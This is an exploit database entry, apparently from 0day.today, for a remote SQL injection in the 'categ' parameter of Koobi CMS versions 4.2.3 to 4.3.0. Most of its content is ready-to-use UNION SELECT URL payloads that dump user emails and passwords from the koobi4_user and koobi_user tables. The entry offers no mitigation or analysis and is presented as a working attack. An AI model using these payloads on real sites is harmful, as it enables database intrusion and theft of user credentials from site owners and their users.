[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2709
Category
web applications
Date add
29-02-2008
Platform
unsorted
==================================================================
Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection Vulnerability
==================================================================



                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Koobi CMS 4.3.0 - 4.2.3
[~] HomePage: http://www.dream4.de/
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS

[+] Exploit v4.3.0 - v4.2.4:

[~] Table: koobi4_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

[+] Exploit v4.2.3:

[~] Table_ koobi_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi_user/*






#  0day.today [2024-11-16]  #